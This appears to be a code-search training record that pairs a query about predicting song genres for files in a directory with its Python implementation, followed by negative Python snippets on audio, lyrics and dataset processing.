[ "0.6249288", "0.5961244", "0.57986456", "0.56695867", "0.5515968", "0.5402372", "0.53549737", "0.52264583", "0.52200854", "0.52137727", "0.5092305", "0.50832874", "0.50748336", "0.50739837", "0.5049888", "0.5019744", "0.5016217", "0.50088155", "0.49824685", "0.49791542", "0.49700025", "0.49674144", "0.4954255", "0.49470833", "0.4946148", "0.49414527", "0.4938247", "0.4920019", "0.49165025", "0.49130428", "0.4903235", "0.4901763", "0.4898171", "0.48882756", "0.48774943", "0.48739833", "0.4873043", "0.48684636", "0.48662606", "0.48532876", "0.48487294", "0.4839504", "0.48377663", "0.4837625", "0.48312905", "0.48271677", "0.48244035", "0.4819383", "0.48193055", "0.4790916", "0.47898015", "0.47792485", "0.47776407", "0.47766003", "0.47753587", "0.4774008", "0.47725734", "0.47720084", "0.47659323", "0.4757381", "0.4754819", "0.47535563", "0.4747155", "0.47375447", "0.47330058", "0.47238043", "0.471035", "0.47043628", "0.47035772", "0.46898836", "0.46811783", "0.46781078", "0.46705136", "0.46627876", "0.4662219", "0.46515533", "0.46471345", "0.4640796", "0.46407223", "0.46390992", "0.4636906", "0.46270898", "0.46234468", "0.46200588", "0.46199372", "0.4614574", "0.46142575", "0.45946994", "0.45862603", "0.45810372", "0.45773894", "0.45761734", "0.4571839", "0.45707753", "0.456543", "0.45608106", "0.4556176", "0.4554605", "0.45429918", "0.45277083" ]
0.82713926
0
Predict the genres of all songs in the given directory, saving this data in a file. Note that the genres of the songs are not known beforehand.
def predict_directory(self, directory_name, result_file_name): logging.info('Starting prediction.') with open(result_file_name, 'ab') as f: writer = csv.writer(f) writer.writerow(('id', 'category')) for song_id in os.listdir(directory_name): song = pd.read_csv('{}{}'.format(directory_name, song_id)).values predicted_genre = self.classify(song) logging.info('Predicted genre: {}'.format(predicted_genre)) writer.writerow((song_id, predicted_genre))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def saveTmdbGenres():\n \n listGenres = tmdb.Genres().list()[\"genres\"]\n \n genres = { _format(g[\"name\"]):i for i, g in enumerate(listGenres) }\n\n np.save(GENRES_FILE, np.asarray([genres]))", "def random_by_genre_list(self):\n\n for genre in self.connection.walk_genres():\n url = self.build_url({\n \"mode\": \"random_by_genre_track_list\",\n \"foldername\": genre[\"value\"].encode(\"utf-8\")})\n\n li = xbmcgui.ListItem(genre[\"value\"])\n xbmcplugin.addDirectoryItem(\n handle=self.addon_handle, url=url, listitem=li, isFolder=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def create_corpus_for_genre(genre):\n corpus = \"\"\n if genre in os.listdir(DATA_DIR):\n #iterate through artists\n for artist in os.listdir(DATA_DIR + \"/\" + genre + \"/\"):\n for filename in os.listdir(DATA_DIR + \"/\" + genre + \"/\" + artist + \"/\"):\n with open(DATA_DIR + \"/\" + genre + \"/\" + artist + \"/\" + filename) as f:\n corpus += f.read()\n return corpus", "def random_by_genre_track_list(self):\n\n genre = self.addon_args[\"foldername\"][0].decode(\"utf-8\")\n\n xbmcplugin.setContent(self.addon_handle, \"songs\")\n\n for track in self.connection.walk_random_songs(\n size=self.random_count, genre=genre):\n self.add_track(track, show_artist=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def generateFeatureData(directory, outFileName='tmp/features.txt', isClassifying=False):\n\n audioList = getAudioFiles(directory)\n\n outFile = open(outFileName, \"w\")\n\n for audio in audioList:\n features = audio.getFeatures()\n \n if isClassifying: # We are classifying, we don't know type\n audioType = '0'\n else: # We are generating training data. Try to predict using file name\n audioType = '1' if audio.predictType() == 'Music' else '-1'\n \n outFile.write(audioType + ' ' + features + ' # ' + audio.name + '\\n')\n\n outFile.close()\n\n return audioList", "def save_data(data_dir):\r\n for k in range(1,11):\r\n fold_name = 'fold' + str(k)\r\n print \"Saving\" + fold_name\r\n features, labels = process_audio(parent_path, [fold_name])\r\n labels = encode(labels)\r\n print \"Features of\", fold_name , \" = \", features.shape\r\n print \"Labels of\", fold_name , \" = \", labels.shape\r\n feature_file = os.path.join(data_dir, fold_name + '_x.npy')\r\n labels_file = os.path.join(data_dir, fold_name + '_y.npy')\r\n np.save(feature_file, features)\r\n print \"Saved \" + feature_file\r\n np.save(labels_file, labels)\r\n print \"Saved \" + labels_file", "def write_pred_kaggle_file(cls, outfname, speech):\n yp = cls.predict(speech.test_doc_vec)\n labels = speech.le.inverse_transform(yp)\n f = codecs.open(outfname, 'w')\n f.write(\"FileIndex,Category\\n\")\n for i in range(len(speech.test_fnames)):\n fname = speech.test_fnames[i]\n f.write(fname + ',' + labels[i] + '\\n')\n f.close()", "def save_artist_songs(genius, name, max_songs, out_dir):\n\tartist = genius.search_artist(name, max_songs=max_songs, sort=\"title\")\n\tif artist is not None and artist.songs is not None:\n\t\tsongs = list(filter(lambda x: x is not None, map(lambda x: x.lyrics, artist.songs)))\n\t\twith open(out_dir + name + '.txt', 'w') as f:\n\t\t\tf.write(''.join(songs))\n\t\treturn len(artist.songs)", "def make_profiles(datafolder, profilefolder, size):\n files = os.listdir(datafolder) \n for file in files:\n languagename = file.split(\"-\")[0]\n encodering = file.split(\"-\")[1]\n bestand = open('training/' + file,'r' , encoding=encodering) #Reads with the correct encoding.\n test = langdetect.trigram_table(bestand.read(), size) #Creates a ngram table of the content of the file.\n filename = languagename + '.' + str(size) + '.txt' #Creates a new filename.\n newfile = open('trigram-models/' + filename, 'w', encoding=\"utf-8\") \n langdetect.write_trigrams(test, 'trigram-models/' + filename) #Creates a new file with the ngrams and their frequency.\n newfile.close()", "def store_samples(self, directory, preprocess_fnc):\n print('Called with', directory)\n out_directory = self._get_directory(preprocess_fnc, directory)\n print('Outdir', out_directory)\n if not os.path.exists(out_directory):\n os.makedirs(out_directory)\n\n print('scanning', os.path.join(self._data_directory, directory))\n\n audio_files = list(iglob_recursive(os.path.join(self._data_directory, directory), '*.flac'))\n print('audio files:', len(audio_files), 'from', os.path.join(self._data_directory, directory))\n with Pool(processes=multiprocessing.cpu_count()) as pool:\n transcript_dict = self._transcript_dict\n\n for audio_file in audio_files:\n audio_id = self._extract_audio_id(audio_file)\n transcript_entry = transcript_dict[audio_id]\n transform_args = (audio_file, preprocess_fnc, transcript_entry, out_directory)\n pool.apply_async(SpeechCorpusReader._transform_and_store_sample, transform_args)\n\n pool.close()\n pool.join()", "def save_all_chunks_with_labels(audio_dir, json_dir, csv_dir):\n for file in os.listdir(json_dir):\n file_path = os.path.join(json_dir, file)\n audio_file_path = os.path.join(audio_dir, file)[:-4] + \"wav\"\n with open(file_path) as f:\n data = json.load(f)\n save_arrays_with_labels(audio_file_path, data, csv_dir)", "def gen_datafiles():\n\tnum_reads = 10000\n\tnum_samples = 100\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_train.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_train.txt')\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_test.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_test.txt')", "def save_predictions(self,file_path):\n # compute average of predictions\n num_examples = len(self.labels)\n\n if num_examples == 0:\n raise Exception (\"nothing to save\")\n\n def string_to_average(string):\n return np.average(np.array(string.split(\",\"),dtype=float))\n prediction_averages = np.around(map(string_to_average,self.predictions),decimals=3)\n\n # sort by prediction averages\n order = np.flipud(prediction_averages.argsort())\n prediction_averages = prediction_averages[order]\n self.pl_pairs = self.pl_pairs[order]\n self.predictions = self.predictions[order]\n self.labels = self.labels[order]\n # write all of the predictions to the file\n f = open(file_path + \"_predictions.txt\", 'w')\n\n for i in range(num_examples):\n f.write((str(prediction_averages[i]) + \" \"*10)[:10]\n + (str(self.labels[i]) + \" \"*50)[:10]\n + str(self.pl_pairs[i] + \" \"*50)[:50]\n + str(self.predictions[i] + \" \"*50)[:50]\n + \"\\n\")\n\n f.close()\n # write and save some metadata\n\n f = open(file_path + \"_scores.txt\", 'w')\n f.write(\"top 100 score: \")\n f.write(str(self.top_100_score(self.predictions,self.labels)))\n f.write(\"\\nAUC: \")\n f.write(str(self.auc(prediction_averages,self.labels)))\n f.write(\"\\nconfusion matrix: \")\n f.write(str(self.confusion_matrix(prediction_averages,self.labels)))\n f.close()\n\n # write a file in Kaggle MAP{K} submision format\n # the form is:\n # Protein1, Ligand3 Ligand4 Ligand2\n # Protein2, Ligand5 Ligand9 Ligand7\n\n raw_database_array = np.genfromtxt(FLAGS.test_set_file_path, delimiter=',', dtype=str)\n receptor_set = raw_database_array[:,2]\n receptor_set = list(set(map(lambda x:x.split('.')[0].split('/')[-1],receptor_set)))\n submission = {}\n for i in range(num_examples):\n # get the name of the ligand and protein\n ligand,receptor = self.pl_pairs[i].split(',')\n ligand = ligand.split('/')[-1].split('.')[0]\n receptor = receptor.split('/')[-1].split('.')[0]\n # add all protein-ligand pairs to submission\n if not receptor in submission.keys():\n submission[receptor] = {}\n submission[receptor]['ligands'] = [ligand]\n submission[receptor]['score'] = [prediction_averages[i]]\n else:\n submission[receptor]['ligands'].append(ligand)\n submission[receptor]['score'].append(prediction_averages[i])\n \n # write and save submisison to file\n # if failed to predict any liagnd for a receptor\n # use placeholder 'L' as predict result\n # e.g. P1234,L\n with open(file_path+'_submission.csv','w') as f:\n f.write('Id,Expected\\n')\n for key in receptor_set:\n if key in submission.keys():\n ligands = np.array(submission[key]['ligands'])\n scores = np.array(submission[key]['score'])\n ligands = ligands[np.flipud(scores.argsort())]\n f.write(key+','+' '.join(ligands)+'\\n')\n else:\n f.write(key+','+'L'+'\\n')", "def get_songs(path):\r\n song_list = []\r\n genre_paths = glob.glob(path + '/*')\r\n for genre_path in genre_paths:\r\n artist_paths = glob.glob(genre_path + '/*')\r\n for artist_path in artist_paths:\r\n album_paths = glob.glob(artist_path + '/*')\r\n for album_path in album_paths:\r\n lyrics_paths = glob.glob(album_path + '/*.txt')\r\n for lyrics_path in lyrics_paths:\r\n song = {}\r\n song[\"genre\"] = genre_path.replace(path + '/', '')\r\n song[\"artist\"] = artist_path.replace(genre_path + '/', '')\r\n song[\"album\"] = album_path.replace(artist_path + '/', '')\r\n song[\"lyrics\"] = open(lyrics_path).read()\r\n song[\"name\"] = lyrics_path[:-4].replace(album_path + '/', '')\r\n song[\"x\"] = 0\r\n song[\"y\"] = 0\r\n song_list.append(song)\r\n return song_list", "def write_genre_index(self):\n for giEntry in self.genreIndex:\n # Write to file\n self.db_file.write(giEntry.get_representation())", "def genre_list(self):\n\n for genre in self.connection.walk_genres():\n url = self.build_url({\n \"mode\": \"albums_by_genre_list\",\n \"foldername\": genre[\"value\"].encode(\"utf-8\")})\n\n li = xbmcgui.ListItem(genre[\"value\"])\n xbmcplugin.addDirectoryItem(\n handle=self.addon_handle, url=url, listitem=li, isFolder=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def save(self, directory):\n for field in self.save_fields:\n np.save(pjoin(directory, field+'.npy'), self.__dict__[field])", "def main():\n\n classes = {\n \"rain\":0,\n \"rooster\":1,\n \"crying_baby\":2,\n \"sea_waves\":3,\n \"clock_tick\":4,\n \"sneezing\":5,\n \"dog\":6,\n \"crackling_fire\":7,\n \"helicopter\":8,\n \"chainsaw\":9,\n }\n\n with open(\"../data/audio/ESC-50-master/meta/esc50.csv\") as f:\n lines = [i[:-1] for i in f.readlines()]\n lines = lines[1:]\n\n os.system(\"rm -rf ../data/audio/ESC-10\")\n os.system(\"mkdir ../data/audio/ESC-10\")\n os.system(\"mkdir ../data/audio/ESC-10/audio\")\n\n meta = []\n for line in lines:\n t = line.split(\",\")\n if (t[-3] == 'True'):\n meta.append(\"../data/audio/ESC-10/audio/%s %d\" % (t[0],classes[t[3]]))\n src = \"../data/audio/ESC-50-master/audio/\"+t[0]\n dst = \"../data/audio/ESC-10/audio/\"+t[0]\n shutil.copy(src,dst)\n\n with open(\"../data/audio/ESC-10/filelist.txt\",\"w\") as f:\n for m in meta:\n f.write(m+\"\\n\")", "def to_files(self, gen, filenames=None):\n\n if filenames:\n self.filenames = filenames\n\n for f, arr in zip(self.pathgen, gen):\n np.save(f, arr)", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def save_all_scripts(genre):\n if os.path.exists('scripts'):\n pass\n else:\n os.mkdir('scripts')\n\n titles = list_titles(genre)\n for title in titles:\n save_script(title)", "def load_dataset(song_folder_name):\n\n # Get all songs saved as numpy arrays in the given folder\n song_list = os.listdir(song_folder_name)\n\n # Create empty lists\n label = []\n mfccs = []\n song_name = []\n\n # Load each song into memory if the artist is included and return\n for song in song_list:\n with open(os.path.join(song_folder_name, song), 'rb') as fp:\n loaded_song = dill.load(fp)\n\n label.append(loaded_song[0])\n mfccs.append(loaded_song[1])\n song_name.append(loaded_song[2])\n\n return label, mfccs, song_name", "def make_predictions(file_list, model, is_game=False):\n temp_list = []\n for wav_file in glob.glob(file_list):\n temp_list.append(reshape_and_predict(filepath=wav_file, saved_model=model, is_game=is_game))\n\n return temp_list", "def gene_txt_of_load(dirname):\n str_list=[]\n list_name=[]\n print 'Yolo Debut'\n for file in os.listdir(dirname):\n if file.endswith(\".npy\"):\n str_list.append(file[:-4]+'=np.load(dirname+'+'\\\"/\\\"'+'+\\\"'+file+'\\\")')\n list_name.append(file[:-4])\n print '\\n'.join(str_list)\n print ','.join(list_name)\n return str_list", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if (name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def read_hansard(train_dir, num_sentences):\n \"\"\"\n # TODO\n # Get starting files from directory:\n # Get file num\n # If file language is english get french with same num, & vice versa\n # load files into two lists: curr_english, curr_french\n # while count < num_sentences:\n # if index >= len(curr_english):\n # load two new files into curr_english and curr_french\n # make sure to keep track of files already read\n # index = 0 \n # sentences['e'][count] = preprocess(curr_english[index])\n # sentences['f'][count] = preprocess(curr_french[index])\n\n #====================================\n # Return (eng, fre) version:\n # Get starting files from directory:\n # Get file num\n # If file language is english get french with same num, & vice versa\n # load files into two lists: curr_english, curr_french\n # while count < num_sentences:\n # if index >= min(len(curr_english), len(curr_french)):\n # load two new files into curr_english and curr_french\n # make sure to keep track of files already read\n # index = 0\n # preprocess and remove SENTSTART and SENTEND from the sentences\n # eng[count] = eng_sentence.split()\n # fre[count] = fre_sentence.split()\n # return (eng, fre)\n \"\"\"\n\n files_examined = set()\n count = 0\n eng = []\n fre = []\n\n # for subdir, dirs, files in os.walk(train_dir):\n # for file in files:\n\n files = os.listdir(train_dir)\n for file in files:\n\n # First set up and validate the files\n file_name, extension = os.path.splitext(file)\n file_name, file_id = os.path.splitext(file_name)\n\n # Skip if not .e or .f file\n if not (extension == '.f' or extension == '.e'):\n continue\n\n # Skip if already examined this file pair\n if file_id in files_examined:\n continue\n\n # Skip if either language file is not available\n eng_file = file_name + file_id + '.e'\n fre_file = file_name + file_id + '.f'\n if eng_file not in files or fre_file not in files:\n continue\n\n # If it reaches here we know we can process it\n files_examined.add(file_id)\n print( \"Reading \" + str(count+1))\n\n # Finally open files and iterate simultaneously\n eng_path = os.path.join(train_dir, eng_file)\n fre_path = os.path.join(train_dir, fre_file)\n with open(eng_path) as english:\n with open(fre_path) as french:\n for E, F in zip(english, french):\n\n # Stop when limit reached\n if count >= num_sentences:\n return (eng, fre)\n\n # Process and split sentences\n E = preprocess(E.rstrip(), 'e')\n F = preprocess(F.rstrip(), 'f')\n\n E_words = E.split()\n F_words = F.split()\n\n eng.append(E_words)\n fre.append(F_words)\n\n count += 1\n\n return (eng, fre)", "def gif_generation(orig_label_path, bound_data_path):\n for sample in os.listdir(bound_data_path):\n if not sample.startswith('.') and osp.isdir(osp.join(bound_data_path, sample)):\n sample_path = osp.join(bound_data_path, sample)\n for artery in os.listdir(sample_path):\n orig_label_pick_path = osp.join(orig_label_path, sample, artery, 'data.pkl')\n bound_pick_path = osp.join(bound_data_path, sample, artery, 'data.pkl')\n\n # function to save result of each artery into gif\n save_gif_artery(orig_label_pick_path, bound_pick_path)", "def load_all_music(directory, accept=(\".wav\", \".mp3\", \".ogg\", \".mdi\")):\n songs = {}\n for song in os.listdir(directory):\n name,ext = os.path.splitext(song)\n if ext.lower() in accept:\n songs[name] = os.path.join(directory, song)\n return songs", "def load_all_music(directory, accept=(\".wav\", \".mp3\", \".ogg\", \".mdi\")):\n songs = {}\n for song in os.listdir(directory):\n name, ext = os.path.splitext(song)\n if ext.lower() in accept:\n songs[name] = os.path.join(directory, song)\n return songs", "def eval_genuine(path):\n out = []\n with open(path, 'r') as fp:\n for line in fp:\n fields = line.rstrip().split()\n ii, tt = fields[:2]\n if tt == 'genuine':\n out.append(ii[2:-4]) # remove 'D_' and '.wav'\n\n return out", "def load_mel_dataset(song_folder_name):\n\n # Get all songs saved as numpy arrays in the given folder\n song_list = os.listdir(song_folder_name)\n\n # Create empty lists\n label = []\n spectrogram = []\n song_name = []\n\n # Load each song into memory if the artist is included and return\n for song in song_list:\n with open(os.path.join(song_folder_name, song), 'rb') as fp:\n loaded_song = dill.load(fp)\n\n label.append(loaded_song[0])\n spectrogram.append(loaded_song[1])\n song_name.append(loaded_song[2])\n\n return label, spectrogram, song_name", "def getData(directory):\n train_path = directory\n corpus_file = maybe_download(directory, \"training-giga-fren.tar\",\n _DATA_URL_)\n if not os.path.isdir(_RAW_SENTENCES_DIR_):\n print(\"Extracting tar file %s\" % corpus_file)\n with tarfile.open(corpus_file, \"r\") as corpus_tar:\n corpus_tar.extractall(directory)\n os.makedirs(_RAW_SENTENCES_DIR_)\n gunzip_file(train_path + \"giga-fren.release2.fixed.en.gz\", _RAW_SENTENCES_DIR_+'sentences.txt')\n \n else:\n print(\"Data already downloaded.\")", "def files():\r\n fn=pd.read_csv(request.files.get('fnm'))\r\n scaling = scaler.transform(fn)\r\n prediction = classifier.predict(scaling)\r\n return 'Predictions'+ str(list(prediction))", "def GetSongFilenames():\n\n\t## Loop through each directory\n\tsong_files = []\n\tfor root, dirs, fnames in os.walk(\"_data\\\\fma_small\\\\\"):\n\t\t\n\t\t## Skip the first level\n\t\tif root == \"_data\\\\fma_small\\\\\":\n\t\t\tcontinue\n\n\t\t## Otherwise collect the files, appending\n\t\t## the root path.\n\t\tsong_files += [root+\"\\\\\"+f for f in fnames]\n\n\treturn song_files", "def generate(self):\n if len(self.files) == 0:\n raise Exception('no files to process')\n music = []\n for filename in self.files:\n music.extend(self._process_file(filename))\n return self._extract_raw(sorted(music, key=lambda tup: (tup[0], tup[1])))", "def save(self, path):\n individual = self.population.fittest_individual()\n order = [int(l) for l in individual.label_order]\n fitness = individual.fitness\n data = {'name': self.ds.name,\n 'num_labels': len(order),\n 'order': order,\n 'fitness': fitness\n }\n with open(path, 'w') as f:\n json.dump(data, f)", "def sentences_for_dir(path='./',separate=True,gzipped=True):\n for filename in cowfiles(path):\n for metadata, data in sentence_generator(filename,separate,gzipped):\n yield metadata, data", "def walk_dataset_librispeech(dataset_path: Path, hp: Map):\n for speaker in dataset_path.iterdir():\n embedding = None # embedding = embed_speaker_librispeech(speaker, hp)\n for flac in speaker.rglob(\"*.flac\"):\n yield preprocess_flac_librispeech(flac, embedding, hp)", "def Subtask4_pre_train_1(path):\n n_dict = {}\n files = os.listdir(path)\n for i in files:\n with open(os.path.join(path, i)) as fp:\n lines = fp.readlines()\n for line in lines:\n text = eval(line)['text'] # extract data from the field of 'text'.\n words = text.split(' ')\n for w in words:\n w = w.replace(\"-LRB-\", \"\").replace(\"-RRB-\", \"\") \\\n .replace(\"-LSB-\", \"\").replace(\"-RSB-\", \"\").replace(\"--\", \"\")\n w = re.sub(\"[,.。:_=+*&^%$#@!?()<>/`';|]\", \"\", w) # replace the noisy with space.\n if not w in n_dict:\n n_dict[w] = 1\n else:\n n_dict[w] += 1 # count the frequencies of every term.\n np.save(PATH + \"pre_train_1_Subtask4.npy\", n_dict)\n print('save complete')", "def read_files(self):\n for f in self.filenames:\n self.games.extend(pgn.loads(open(f).read()))", "def save(self):\n\n if (self._save != '0'):\n p = self._save+self._path[-3:-1]+'_'+str(self._qn)+'.dat'\n np.savetxt(p, self._gf)\n else:\n sys.exit(\"Wrong path to save\")", "def retrieve_sequences_pickle(working_directory, genes):\n\n sequences_per_gene = {}\n for gene in genes:\n with open(os.path.join(working_directory, \"sequences\", gene + \".pkl\"), 'rb') as handle:\n sequences = pickle.load(handle) \n sequences_per_gene.update({gene:sequences})\n return sequences_per_gene", "def writeRatingsToSongs(self):\n judgeNotesLogger.info(\"writeRatingsToSongs: Writing file containing songs for each rating\")\n try:\n os.chdir(self.fileDir)\n sortedRatings = sorted(self.ratingsToSongs.keys(), key=float)\n fileName = \"ratingsToSongs_\" + self.judgeName + \".txt\"\n with open(fileName, 'w') as outFile:\n\n # Write out the normal ratings first.\n for rating in sortedRatings:\n songsInRating = self.ratingsToSongs[rating]\n outFile.write(\"[\"+str(rating)+\"/10]\")\n for song in songsInRating:\n if song[2] != \"\":\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"} (\"+str(song[2]) + \")\")\n else:\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"}\")\n outFile.write(\"\\n\\n\")\n\n # Write out the special ratings after.\n sortedRatings = sorted(self.specialRatingsToSongs.keys(), key=str.lower)\n for rating in sortedRatings:\n songsInRating = self.specialRatingsToSongs[rating]\n outFile.write(\"[\"+str(rating)+\"]\")\n for song in songsInRating:\n if song[2] != \"\":\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"} (\"+str(song[2]) + \")\")\n else:\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"}\")\n outFile.write(\"\\n\\n\")\n \n outFile.close()\n judgeNotesLogger.info(\"writeRatingsToSongs: Successfully wrote file '%s'\", fileName)\n except:\n judgeNotesLogger.warning(\"writeRatingsToSongs: {0}: {1}\".format(sys.exc_info()[0].__name__,\n str(sys.exc_info()[1])))", "def get_audios_and_labels(data_dir: str) -> (List[Any], List[int]):\n test_dataset = get_dataset(data_dir)\n test_audios = []\n test_labels = []\n for audio, label in test_dataset:\n test_audios.append(audio.numpy())\n test_labels.append(label.numpy())\n test_audios = np.array(test_audios)\n test_labels = np.array(test_labels)\n return test_audios, test_labels", "def process(self, dirPath, outPath):\n total_grams = 0\n four_grams = defaultdict(int)\n files = os.listdir(dirPath)\n for fnx in files:\n fnxPath = os.path.join(dirPath, fnx)\n if fnx != 'README' and os.path.isfile(fnxPath):\n tokens = self.preprocess_file_to_tokens(dirPath, fnx)\n countInDoc, gramsInDoc, countNew, grams = \\\n self.add_four_grams(tokens, four_grams)\n total_grams += countNew\n print(\"%-30s%10d%10d\" % (fnx, countInDoc, countNew) )\n print(\"Total 4-grams found:\", total_grams)\n return total_grams, four_grams", "def load_data(self):\r\n if not os.path.exists(self.origin_dir):\r\n raise ValueError(f\"Folder {self.origin_dir} not exists!\")\r\n\r\n # loop folders\r\n listglobs = glob.glob(os.path.join(self.origin_dir)+r\"[0-9]*\")\r\n count = 0\r\n temp = []\r\n for x in listglobs:\r\n\r\n # step1, get speaker id md5\r\n user_id = x.rsplit(\"\\\\\")[-1]\r\n speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n print(\"1=>\", x)\r\n\r\n for k in [\"你好小顺\", \"小顺小顺\"]:\r\n paths = os.path.join(x, k)\r\n print(\"2=>\", paths)\r\n # step2, parse speaker info\r\n with open(os.path.join(paths, \"spearker_info.txt\"), 'r', encoding=\"utf-8\") as f:\r\n line = f.readline()\r\n arrs = line.strip().split(\"\\\\t\")\r\n if len(arrs) != 3:\r\n raise ValueError(\"Required three field in speaker_info<id>\\t<gender>\\t<age>\")\r\n self.wav_desc[\"gender\"] = arrs[1].strip(\"<\").rstrip(\">\")\r\n self.wav_desc[\"age\"] = arrs[-1].strip(\"<\").rstrip(\">\")\r\n\r\n # step3, parse wav detailed information\r\n # key: wav_id, value: info_list, [keyword, noise_type, distance, speed,user_id, equipment]\r\n wav_infos_dict = {}\r\n with open(os.path.join(paths, \"wav_desc.txt\"), \"r\", encoding=\"utf-8\") as f:\r\n for line in f.readlines():\r\n arrs = line.strip().split(\"\\\\t\")\r\n wav_infos_dict[arrs[0].strip(\"<\").rstrip(\">\")] = [x.strip(\"<\").rstrip(\">\") for\r\n x in arrs[1:]]\r\n\r\n print(f\"Parse wav info finished find {len(wav_infos_dict)} infos.\")\r\n\r\n # Step4, audio with background noise and without nose, which was back_wav and wav_data folder\r\n for wav_folder in [\"back_wav\", \"wav_data\"]:\r\n audio_lists = glob.glob(os.path.join(paths + f\"\\\\{wav_folder}\", \"*.wav\"))\r\n for xa in audio_lists:\r\n # copy data to\r\n wav_id, user_id = get_wav_name(xa)\r\n # print(wav_id, user_id)\r\n # create md5 id\r\n utt_id = hashlib.md5(xa.encode(\"utf-8\")).hexdigest()\r\n # speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n # print(utt_id, speaker_id)\r\n # collect all info for an audio\r\n self.wav_desc[\"utt_id\"] = utt_id\r\n infos = wav_infos_dict[wav_id]\r\n if len(infos) != 6:\r\n print(\"==>\", infos)\r\n self.wav_desc[\"keyword_id\"] = self.keywords_dict[infos[0]]\r\n self.wav_desc[\"noise_type\"] = infos[1]\r\n self.wav_desc[\"distance\"] = infos[2]\r\n self.wav_desc[\"record_speed\"] = infos[3]\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n self.wav_desc[\"record_equipment\"] = infos[5]\r\n\r\n # record wav information\r\n t_infos = copy.deepcopy(self.wav_desc)\r\n self.all_wavs.append(t_infos)\r\n count += 1\r\n temp.append(utt_id)\r\n\r\n # copy data to resource folder\r\n dest = shutil.copy2(xa, os.path.join(self.dest_dir, f\"audios/{utt_id}.wav\"))\r\n set_index = which_set(dest, 20, 30)\r\n self.data_index[set_index].append(t_infos)\r\n\r\n # write wav information into json file\r\n with open(os.path.join(self.dest_dir, \"resources/wav_desc.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.all_wavs, f, ensure_ascii=False, indent=True)\r\n print(f\"total wavs:{count}, total ids:{len(temp)}\")\r\n for set_index in self.data_index.keys():\r\n with open(os.path.join(self.dest_dir, f\"resources/p_{set_index}.json\"), \"w\", encoding=\"utf-8\") as f:\r\n json.dump(self.data_index[set_index], f, ensure_ascii=False, indent=True)\r\n print(f\"Collect {set_index} data total {len(self.data_index[set_index])} samples.\")", "def FeaturesGen(ChopChopresults, outputDir, sgRNA_type):\n \n #make output Directory if it does not already exist\n if not os.path.isdir(outputDir):\n os.makedirs(outputDir)\n \n #list the directory contents \n for i,j,k in os.walk(ChopChopresults): #use walk to go through and find all directories\n \n if j == []: #no subdirectories\n saveDF = pd.DataFrame() #initiate dataframe\n for target in k: #loop through to find the sgRNA sequences\n if target.endswith('.offtargets'):\n with open(os.path.join(i,target), 'r+') as f:\n guide = f.readlines()\n #add them to a dataframe\n temp = pd.Series()\n temp['guideNo'] = target.split('.')[0] + sgRNA_type\n temp['guideSeq'] = guide.pop(0).rstrip()\n \n saveDF = saveDF.append(temp.to_frame().transpose())\n saveDF['type'] = 'sgRNA'\n \n if sgRNA_type == 'General' or sgRNA_type == None:\n saveDF['fwd'] = 'pink'\n saveDF['rev'] = 'green'\n elif sgRNA_type == 'GG':\n saveDF['fwd'] = 'yellow'\n saveDF['rev'] = 'plum'\n elif sgRNA_type == 'GA':\n saveDF['fwd'] = 'cyan'\n saveDF['rev'] = 'cornflower blue'\n \n \n #save to txt file with tab delimiter\n saveDF.to_csv(os.path.join(outputDir, os.path.basename(i) + '_features.txt'),\\\n index = False, header = False, sep = '\\t')\n \n del saveDF", "def dump_genres_to_db() -> None:\n # TODO: connection should probably be done in a safer way\n db = database.SessionLocal()\n genres = get_genres()\n\n for key in genres:\n formatted_genre = schemas.Genre(\n id=key,\n name=genres[key],\n value=genres[key],\n )\n\n db_genre = crud.get_genre_by_id(db=db, genre_id=key)\n if not db_genre:\n crud.create_genre(db=db, genre=formatted_genre)\n db.close()", "def save_audio(ndarray, feature_name, out_path, x, y, new_labels, filename=None, sr=SR):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name, 'wav')\n librosa.output.write_wav(out_path / filename, ndarray, sr=sr, norm=True)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return 